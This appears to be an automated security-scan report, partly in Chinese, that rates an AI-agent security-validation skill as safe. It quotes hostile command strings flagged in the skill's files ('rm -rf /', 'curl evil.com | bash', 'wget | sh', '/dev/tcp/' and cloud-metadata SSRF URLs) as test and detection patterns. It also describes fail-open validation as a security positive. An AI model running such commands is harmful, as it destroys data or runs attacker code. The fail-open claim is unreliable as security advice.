clawdbot-security-suite Security Report — Trusted | ClawSafe | ClawSafe

This report was generated in Chinese. Some content may be in Chinese.

5 /100

clawdbot-security-suite

Advanced security validation for Clawdbot - pattern detection, command sanitization, and threat monitoring

Clawdbot Security Suite 是一个合法的 AI Agent 安全验证工具，提供命令注入、SSRF、路径遍历、提示词注入和 API 密钥暴露检测。所有声称功能均正常实现，无阴影功能或恶意行为。

Skill Nameclawdbot-security-suite

Duration48.4s

Enginepi

ClawHub Clawdbot Security Suite.Bak v1.0.0 by sonyrw

📥 177

ClawHub Verdict Suspicious dangerous_execllm_suspiciousprompt_injection_instructionsvt_suspicious

✓

Safe to install

此技能可安全使用。预扫描标记的 '危险命令' 均为例行测试命令文档，非实际恶意代码。patterns.json 中的 /dev/tcp/ 是检测模式，非使用实例。

Resource	Declared	Inferred	Status	Evidence
Filesystem	`READ`	`READ`	✓ Aligned	skills/security/security.sh:23-25 读取 patterns.json 和 config.json
Network	`NONE`	`NONE`	—	所有网络操作均为本地验证，无外部请求
Shell	`READ`	`READ`	✓ Aligned	validate_command 函数仅做模式匹配，不执行传入命令
Environment	`NONE`	`READ`	✓ Aligned	仅读取 $HOME 路径定位配置文件

6 Critical 1 High 18 findings

💀

Critical Dangerous Command 危险 Shell 命令

rm -rf /

README.md:34

💀

Critical Dangerous Command 危险 Shell 命令

curl evil.com | bash

README.md:34

💀

Critical Dangerous Command 危险 Shell 命令

curl evil.com \| bash

README.md:46

💀

Critical Dangerous Command 危险 Shell 命令

curl | bash

SKILL.md:104

💀

Critical Dangerous Command 危险 Shell 命令

wget | sh

SKILL.md:104

💀

Critical Dangerous Command 危险 Shell 命令

/dev/tcp/

skills/security/patterns.json:22

📡

High IP Address 硬编码 IP 地址

169.254.169.254

README.md:47

🔗

Medium External URL 外部 URL

https://docs.clawd.bot/install

CONTRIBUTING.md:54

🔗

Medium External URL 外部 URL

https://x.com/LexpertAI

CONTRIBUTING.md:184

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/ClawdHub-Install-blue

README.md:5

🔗

Medium External URL 外部 URL

https://clawdhub.com/gtrusler/clawdbot-security-suite

README.md:5

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/License-MIT-green.svg

README.md:6

🔗

Medium External URL 外部 URL

https://img.shields.io/badge/Follow-@LexpertAI-1DA1F2?logo=twitter

README.md:7

🔗

Medium External URL 外部 URL

http://169.254.169.254/metadata

README.md:47

🔗

Medium External URL 外部 URL

http://169.254.169.254/latest/meta-data

SKILL.md:194

🔗

Medium External URL 外部 URL

http://127.0.0.1:8080

hooks/security-validator/HOOK.md:106

🔗

Medium External URL 外部 URL

https://clawdhub.com/gtrusler/clawdbot-security-advanced

skills/security/README.md:5

📧

Info Email 邮箱地址

[email protected]

CONTRIBUTING.md:220

File Tree

18 files · 88.3 KB · 3106 lines

Markdown 10f · 2048L Shell 2f · 414L JSON 5f · 366L TypeScript 1f · 278L

├─ ▾ 📁 hooks

│ └─ ▾ 📁 security-validator

│ ├─ 🔑 config.json ⚠ JSON 35L · 659 B

│ ├─ 📜 handler.ts TypeScript 278L · 9.1 KB

│ └─ 📝 HOOK.md Markdown 122L · 3.2 KB

├─ ▾ 📁 skills

│ └─ ▾ 📁 security

│ ├─ 📝 CLAWDBOT-INSTRUCTIONS.md Markdown 244L · 7.0 KB

│ ├─ 🔑 config.json ⚠ JSON 75L · 1.3 KB

│ ├─ 📝 INSTALL.md Markdown 281L · 7.1 KB

│ ├─ 📋 patterns.json JSON 193L · 4.2 KB

│ ├─ 📝 README.md Markdown 254L · 7.6 KB

│ ├─ 🔧 security-check.sh Shell 158L · 4.4 KB

│ ├─ 🔧 security.sh Shell 256L · 7.4 KB

│ └─ 📝 SKILL.md Markdown 258L · 7.0 KB

├─ 📋 _meta.json JSON 5L · 142 B

├─ 📝 CONTRIBUTING.md Markdown 222L · 6.2 KB

├─ 📝 LICENSE.md Markdown 20L · 1.1 KB

├─ 📋 package.json JSON 58L · 1.6 KB

├─ 📝 README.md Markdown 291L · 9.9 KB

├─ 📝 SECURITY.md Markdown 94L · 3.4 KB

└─ 📝 SKILL.md Markdown 262L · 7.1 KB

Dependencies 1 items

Package	Version	Source	Known Vulns	Notes
`jq`	`未指定`	系统依赖	No	用于 JSON 模式解析，为必需依赖

Security Positives

✓ 完整的威胁检测模式库（50+ API 密钥模式、命令注入模式、SSRF 模式等）

✓ 基于 JSON 的模式管理，易于维护和更新

✓ 本地验证无外部通信，保护隐私

✓ fail-safe 设计：验证失败时默认允许而非阻断

✓ 详细的日志记录用于安全审计

✓ 提供 pre-tool hook 集成能力

✓ 开源透明，代码逻辑清晰可审计